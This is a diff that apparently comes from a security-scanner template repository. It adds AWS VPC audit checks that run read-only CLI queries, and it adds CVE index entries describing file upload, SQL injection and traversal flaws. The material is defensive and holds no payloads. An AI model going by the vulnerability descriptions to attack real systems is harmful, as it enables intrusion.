+# digest: 4a0a0047304502204e05c381a073d28047bdf9026597e5d331abca5011bbd8887ac323dd2b2983fb02210097ddd0dd706718f37b2c2f54820e543a9c6549883adc31296235e4b04fe04e97:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/vpc/vpc-endpoint-exposed.yaml b/cloud/aws/vpc/vpc-endpoint-exposed.yaml
new file mode 100644
index 0000000000..6fe8d3c737
--- /dev/null
+++ b/cloud/aws/vpc/vpc-endpoint-exposed.yaml
@@ -0,0 +1,63 @@
+id: vpc-endpoint-exposed
+info:
+ name: Exposed VPC Endpoint
+ author: princechaddha
+ severity: medium
+ description: |
+ Identify and secure fully accessible Amazon VPC endpoints to prevent unauthorized access to AWS services.
+ impact: |
+ Allows unrestricted access to AWS services via the exposed VPC endpoint, potentially leading to data leakage or unauthorized operations.
+ remediation: |
+ Update the VPC endpoint's policy to restrict access only to authorized entities and ensure all requests are signed.
+ reference:
+ - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-endpoints-access.html
+ tags: cloud,devops,aws,amazon,vpc,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let VpcIds of iterate(template.VpcId)){
+ set("vpc", VpcIds)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-vpc-endpoints --region $region --output table --query 'VpcEndpoints[*].VpcEndpointId' --output json
+
+ extractors:
+ - type: json
+ name: VpcId
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-vpc-endpoints --region $region --vpc-endpoint-ids $vpc --query 'VpcEndpoints[*].PolicyDocument' --output json
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"AWS": "*"'
+ - '"Principal": "*"'
+
+ - type: word
+ words:
+ - "Condition"
+ negative: true
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"VPC endpoints for " + vpc + "are exposed."'
+# digest: 4a0a004730450221009cd9ca7d1c7ce5d6db43cc95291be7e509c29f9ed1c7559ee1aeb31a6579920902206e30e36ec371d03d1c5d805d349458ee43fd27bd65917e4f33050e359de8ea3b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml
new file mode 100644
index 0000000000..c2dcfb6728
--- /dev/null
+++ b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml
@@ -0,0 +1,56 @@
+id: vpc-endpoints-not-deployed
+info:
+ name: VPC Endpoints Not Deployed
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensures VPC endpoints are utilized for secure AWS service connectivity without needing an Internet Gateway, enhancing network security and efficiency.
+ impact: |
+ Avoids data exposure and reduces bandwidth use by ensuring AWS traffic remains within the AWS network, without public IP requirements for EC2 instances.
+ remediation: |
+ Implement VPC endpoints for supported AWS services to secure and optimize connectivity within your VPC, minimizing external access risks.
+ reference:
+ - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-endpoints.html
+ tags: cloud,devops,aws,amazon,vpc,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let VpcIds of iterate(template.VpcId)){
+ set("vpc", VpcIds)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-vpcs --region $region --query 'Vpcs[*].VpcId' --output json
+
+ extractors:
+ - type: json
+ name: VpcId
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-vpc-endpoints --region $region --filters Name=vpc-id,Values=$vpc --query 'VpcEndpoints[*].VpcEndpointId'
+
+ matchers:
+ - type: word
+ words:
+ - "[]"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"VPC Endpoints Not Deployed in the VPC network " + vpc'
+# digest: 4a0a004730450220305c7cb9ef27a7249c71a3e30664db9f051b0f5438fe8ce42f2024ea91bfa24e022100e5b9e9b019adf2b1fcfd5121540efdbaf0c5fd39072523eacf41b5a50319666e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml
new file mode 100644
index 0000000000..ca6474d99e
--- /dev/null
+++ b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml
@@ -0,0 +1,58 @@
+id: vpc-flowlogs-not-enabled
+info:
+ name: VPC Flow Logs Not Enabled
+ author: princechaddha
+ severity: low
+ description: |
+ Ensures Amazon VPC Flow Logs are enabled for tracking network traffic to and from VPCs, aiding in security and troubleshooting.
+ impact: |
+ Without VPC Flow Logs, detecting abnormal traffic patterns or breaches becomes difficult, increasing risk of undetected threats.
+ remediation: |
+ Enable VPC Flow Logs in the AWS Management Console under the VPC dashboard to collect data on IP traffic going to and from network interfaces in your VPC.
+ reference:
+ - https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html
+ tags: cloud,devops,aws,amazon,vpc,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let VpcIds of iterate(template.VpcId)){
+ set("vpc", VpcIds)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-vpcs --region $region --query 'Vpcs[*].VpcId' --output json
+
+ extractors:
+ - type: json
+ name: VpcId
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-flow-logs --region $region --filter "Name=resource-id,Values=$vpc"
+
+ matchers:
+ - type: word
+ words:
+ - "[]"
+ condition: and
+
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Flow Logs feature is not enabled for the VPC " + vpc'
+# digest: 4a0a00473045022016d83c316f318298be2c514542422c1a2f3a42517ac740d4b85ca980c9bf4676022100e7af7b416817f374b418962094ee777893f8fed6b17880fea736d1eb6caa38b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/vpc/vpn-tunnel-down.yaml b/cloud/aws/vpc/vpn-tunnel-down.yaml
new file mode 100644
index 0000000000..1e7ddb8308
--- /dev/null
+++ b/cloud/aws/vpc/vpn-tunnel-down.yaml
@@ -0,0 +1,56 @@
+id: vpn-tunnel-down
+info:
+ name: AWS VPN Tunnel Down
+ author: princechaddha
+ severity: high
+ description: |
+ Ensures AWS VPN tunnels are in an UP state, facilitating uninterrupted network traffic through the Virtual Private Network.
+ impact: |
+ If a VPN tunnel is DOWN, it could disrupt network connectivity and access to resources in your VPC, impacting business operations.
+ remediation: |
+ Monitor VPN tunnel status via the AWS Management Console or CLI. If a tunnel is DOWN, troubleshoot according to AWS documentation and ensure redundancy by configuring multiple tunnels.
+ reference:
+ - https://docs.aws.amazon.com/vpn/latest/s2svpn/VPNConnections.html
+ tags: cloud,devops,aws,amazon,vpn,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+flow: |
+ code(1)
+ for(let VpnConnectionIds of iterate(template.vpnconnactions)){
+ set("vpnid", VpnConnectionIds)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-vpn-connections --region $region --filters "Name=state,Values=available" --query 'VpnConnections[*].VpnConnectionId' --output json
+
+ extractors:
+ - type: json
+ name: vpnconnactions
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-vpn-connections --region $region --vpn-connection-ids $vpnid --query 'VpnConnections[*].VgwTelemetry[*].Status[]'
+
+ matchers:
+ - type: word
+ words:
+ - "DOWN"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - 'vpnid + " VPN tunnel is down"'
+# digest: 490a0046304402205ecec5a00e3d0521ad5a2e9ac0cebbe83e91d206c2233f683dcd750ff5b3841c02205528afb57d459d2c5075638280afcf53459f71aaeb2a5cabc21c41659d91f510:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/aws-app-enum.yaml b/cloud/enum/aws-app-enum.yaml
index 8ba021d6db..55fe60e33b 100644
--- a/cloud/enum/aws-app-enum.yaml
+++ b/cloud/enum/aws-app-enum.yaml
@@ -34,4 +34,5 @@ http:
- 200
- 302
condition: or
+
# digest: 490a0046304402200ead17d9381546ddc9f16663c90d8511969313ccc238f43ffde6040eb1190a3e02204f529c738530581af958cd8d83110cdb30cfc8f14818c8a379fb398f975045f8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/azure-db-enum.yaml b/cloud/enum/azure-db-enum.yaml
index 03a3a5ba85..202edfdb07 100644
--- a/cloud/enum/azure-db-enum.yaml
+++ b/cloud/enum/azure-db-enum.yaml
@@ -29,4 +29,5 @@ dns:
part: answer
words:
- "IN\tA"
+
# digest: 4a0a0047304502206a999e317308128dc9a9f3114f003b2c29cad9f569d6922502a8ac90971cf927022100c4fe9eea1496997e9ef66f8a46c2ece4bd511dede88aaf58d36410be3f2cc758:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml
index 87785a91a7..bad214eb39 100644
--- a/cloud/enum/azure-vm-cloud-enum.yaml
+++ b/cloud/enum/azure-vm-cloud-enum.yaml
@@ -63,4 +63,5 @@ dns:
part: answer
words:
- "IN\tA"
+
# digest: 490a0046304402200614bd35195e042742d9840244b46d9f68e4918956d5672a7549edaedbfe5f2e022051271716ac72339c39f76569585c0a256b19ce6238da5e3ea6a9d36b2d80011e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/azure-website-enum.yaml b/cloud/enum/azure-website-enum.yaml
index 52e35165b1..c66308e9f5 100644
--- a/cloud/enum/azure-website-enum.yaml
+++ b/cloud/enum/azure-website-enum.yaml
@@ -34,4 +34,5 @@ http:
- 200
- 302
condition: or
+
# digest: 4a0a0047304502201886de38da3a1bc0e95ff00b7cbf1e6cb0ef6f13197aa042a25d3a4f1ee588ad022100e067b58657d10e3b2d41283022c15120ed1d17f20d58b821418e953bfbfe2b0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/gcp-app-engine-enum.yaml b/cloud/enum/gcp-app-engine-enum.yaml
index 6fc78a4f32..94dd439803 100644
--- a/cloud/enum/gcp-app-engine-enum.yaml
+++ b/cloud/enum/gcp-app-engine-enum.yaml
@@ -40,4 +40,5 @@ http:
- "status_code==302"
- contains(location, "login")
condition: and
+
# digest: 490a00463044022049b2ab788a102342c3ee4b36d87315f145c3e963f1bd8389d1b2d9f90540f05402203bb1fa138a4e29c568c6bd421cb97c526e822c25fc952368295259787bc159d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/gcp-bucket-enum.yaml b/cloud/enum/gcp-bucket-enum.yaml
index ce18ad89d5..545f31d7c1 100644
--- a/cloud/enum/gcp-bucket-enum.yaml
+++ b/cloud/enum/gcp-bucket-enum.yaml
@@ -37,4 +37,5 @@ http:
name: "Protected GCP Bucket"
status:
- 403
+
# digest: 4a0a00473045022038ad1830fc8e77debc4c9fcab4d7eb4c62b9930c3f98860f5e6877c1e72578a4022100e3ea9b5730d32e9219e4716c79b5203733ff802460ee921d0f0c2199ecca7989:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/gcp-firebase-app-enum.yaml b/cloud/enum/gcp-firebase-app-enum.yaml
index d8ac9af36c..5387253310 100644
--- a/cloud/enum/gcp-firebase-app-enum.yaml
+++ b/cloud/enum/gcp-firebase-app-enum.yaml
@@ -32,4 +32,5 @@ http:
name: "Open GCP Firebase App"
status:
- 200
+
# digest: 4a0a0047304502202cb00f1926f91f36e3db3668c74866756cfda2081ea2a15ae99606c13542a8d3022100e57e4412254764ae84c84ff3fbf3932c79895e187f380a33749e25519df189f5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/enum/gcp-firebase-rtdb-enum.yaml b/cloud/enum/gcp-firebase-rtdb-enum.yaml
index 6955800564..a99dca6b86 100644
--- a/cloud/enum/gcp-firebase-rtdb-enum.yaml
+++ b/cloud/enum/gcp-firebase-rtdb-enum.yaml
@@ -48,4 +48,5 @@ http:
name: "Deactivated GCP Firebase RTDB"
status:
- 423
+
# digest: 4b0a00483046022100c5f895d4aa3a88d0917500200d33cf6c779e563a27cfcb1c1849c6740af720b30221009b12087b38af6b723bd3add8f08dd28e76b18133a03396b5d1af3693bfbdcecc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cves.json b/cves.json
index e4ad01bbab..027b2bde54 100644
--- a/cves.json
+++ b/cves.json
@@ -289,6 +289,7 @@
{"ID":"CVE-2015-4074","Info":{"Name":"Joomla! Helpdesk Pro plugin \u003c1.4.0 - Local File Inclusion","Severity":"high","Description":"Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-4074.yaml"}
{"ID":"CVE-2015-4127","Info":{"Name":"WordPress Church Admin \u003c0.810 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-4127.yaml"}
{"ID":"CVE-2015-4414","Info":{"Name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","Severity":"medium","Description":"WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-4414.yaml"}
+{"ID":"CVE-2015-4455","Info":{"Name":"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload","Severity":"critical","Description":"Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-4455.yaml"}
{"ID":"CVE-2015-4632","Info":{"Name":"Koha 3.20.1 - Directory Traversal","Severity":"high","Description":"Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-4632.yaml"}
{"ID":"CVE-2015-4666","Info":{"Name":"Xceedium Xsuite \u003c=2.4.4.5 - Local File Inclusion","Severity":"medium","Description":"Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-4666.yaml"}
{"ID":"CVE-2015-4668","Info":{"Name":"Xsuite \u003c=2.4.4.5 - Open Redirect","Severity":"medium","Description":"Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-4668.yaml"}
@@ -499,7 +500,7 @@
{"ID":"CVE-2018-10818","Info":{"Name":"LG NAS Devices - Remote Code Execution","Severity":"critical","Description":"LG NAS devices contain a pre-auth remote command injection via the \"password\" parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2018/CVE-2018-10818.yaml"}
{"ID":"CVE-2018-10822","Info":{"Name":"D-Link Routers - Local File Inclusion","Severity":"high","Description":"D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after \"GET /uir\" in an HTTP request to the web interface.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-10822.yaml"}
{"ID":"CVE-2018-10823","Info":{"Name":"D-Link Routers - Remote Command Injection","Severity":"high","Description":"D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2018/CVE-2018-10823.yaml"}
-{"ID":"CVE-2018-10942","Info":{"Name":"Prestashop AttributeWizardPro Module - Arbitrary File Upload","Severity":"critical","Description":"In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2018/CVE-2018-10942.yaml"}
+{"ID":"CVE-2018-10942","Info":{"Name":"Prestashop AttributeWizardPro Module - Arbitrary File Upload","Severity":"critical","Description":"In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-10942.yaml"}
{"ID":"CVE-2018-10956","Info":{"Name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","Severity":"high","Description":"IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-10956.yaml"}
{"ID":"CVE-2018-11227","Info":{"Name":"Monstra CMS \u003c=3.0.4 - Cross-Site Scripting","Severity":"medium","Description":"Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-11227.yaml"}
{"ID":"CVE-2018-11231","Info":{"Name":"Opencart Divido - Sql Injection","Severity":"high","Description":"OpenCart Divido plugin is susceptible to SQL injection\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2018/CVE-2018-11231.yaml"}
@@ -773,6 +774,7 @@
{"ID":"CVE-2019-6715","Info":{"Name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","Severity":"high","Description":"WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-6715.yaml"}
{"ID":"CVE-2019-6799","Info":{"Name":"phpMyAdmin \u003c4.8.5 - Local File Inclusion","Severity":"medium","Description":"phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2019/CVE-2019-6799.yaml"}
{"ID":"CVE-2019-6802","Info":{"Name":"Pypiserver \u003c1.2.5 - Carriage Return Line Feed Injection","Severity":"medium","Description":"Pypiserver through 1.2.5 and below is susceptible to carriage return line feed injection. An attacker can set arbitrary HTTP headers and possibly conduct cross-site scripting attacks via a %0d%0a in a URI.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-6802.yaml"}
+{"ID":"CVE-2019-7139","Info":{"Name":"Magento - SQL Injection","Severity":"critical","Description":"An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7139.yaml"}
{"ID":"CVE-2019-7192","Info":{"Name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","Severity":"critical","Description":"This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7192.yaml"}
{"ID":"CVE-2019-7219","Info":{"Name":"Zarafa WebApp \u003c=2.0.1.47791 - Cross-Site Scripting","Severity":"medium","Description":"Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-7219.yaml"}
{"ID":"CVE-2019-7238","Info":{"Name":"Sonatype Nexus Repository Manager \u003c3.15.0 - Remote Code Execution","Severity":"critical","Description":"Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7238.yaml"}
@@ -1548,6 +1550,7 @@
{"ID":"CVE-2022-0656","Info":{"Name":"uDraw \u003c3.3.3 - Local File Inclusion","Severity":"high","Description":"uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0656.yaml"}
{"ID":"CVE-2022-0658","Info":{"Name":"CommonsBooking \u003c 2.6.8 - SQL Injection","Severity":"critical","Description":"The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0658.yaml"}
{"ID":"CVE-2022-0660","Info":{"Name":"Microweber \u003c1.2.11 - Information Disclosure","Severity":"high","Description":"Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0660.yaml"}
+{"ID":"CVE-2022-0666","Info":{"Name":"Microweber \u003c 1.2.11 - CRLF Injection","Severity":"high","Description":"CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in Packagist microweber/microweber prior to 1.2.11.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0666.yaml"}
{"ID":"CVE-2022-0678","Info":{"Name":"Microweber \u003c1.2.11 - Cross-Site Scripting","Severity":"medium","Description":"Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0678.yaml"}
{"ID":"CVE-2022-0679","Info":{"Name":"WordPress Narnoo Distributor \u003c=2.5.1 - Local File Inclusion","Severity":"critical","Description":"WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0679.yaml"}
{"ID":"CVE-2022-0692","Info":{"Name":"Rudloff alltube prior to 3.0.1 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0692.yaml"}
@@ -1605,6 +1608,7 @@
{"ID":"CVE-2022-1439","Info":{"Name":"Microweber \u003c1.2.15 - Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1439.yaml"}
{"ID":"CVE-2022-1442","Info":{"Name":"WordPress Metform \u003c=2.1.3 - Information Disclosure","Severity":"high","Description":"WordPress Metform plugin through 2.1.3 is susceptible to information disclosure due to improper access control in the ~/core/forms/action.php file. An attacker can view all API keys and secrets of integrated third-party APIs such as that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-1442.yaml"}
{"ID":"CVE-2022-1574","Info":{"Name":"WordPress HTML2WP \u003c=1.0.0 - Arbitrary File Upload","Severity":"critical","Description":"WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-1574.yaml"}
+{"ID":"CVE-2022-1580","Info":{"Name":"Site Offline WP Plugin \u003c 1.5.3 - Authorization Bypass","Severity":"medium","Description":"The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2022/CVE-2022-1580.yaml"}
{"ID":"CVE-2022-1595","Info":{"Name":"WordPress HC Custom WP-Admin URL \u003c=1.4 - Admin Login URL Disclosure","Severity":"medium","Description":"WordPress HC Custom WP-Admin URL plugin through 1.4 leaks the secret login URL when sending a specially crafted request, thereby allowing an attacker to discover the administrative login URL.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1595.yaml"}
{"ID":"CVE-2022-1597","Info":{"Name":"WordPress WPQA \u003c5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-1597.yaml"}
{"ID":"CVE-2022-1598","Info":{"Name":"WordPress WPQA \u003c5.5 - Improper Access Control","Severity":"medium","Description":"WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-1598.yaml"}
@@ -1637,7 +1641,7 @@
{"ID":"CVE-2022-22242","Info":{"Name":"Juniper Web Device Manager - Cross-Site Scripting","Severity":"medium","Description":"Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-22242.yaml"}
{"ID":"CVE-2022-22536","Info":{"Name":"SAP Memory Pipes (MPI) Desynchronization","Severity":"critical","Description":"SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-22536.yaml"}
{"ID":"CVE-2022-22733","Info":{"Name":"Apache ShardingSphere ElasticJob-UI privilege escalation","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-22733.yaml"}
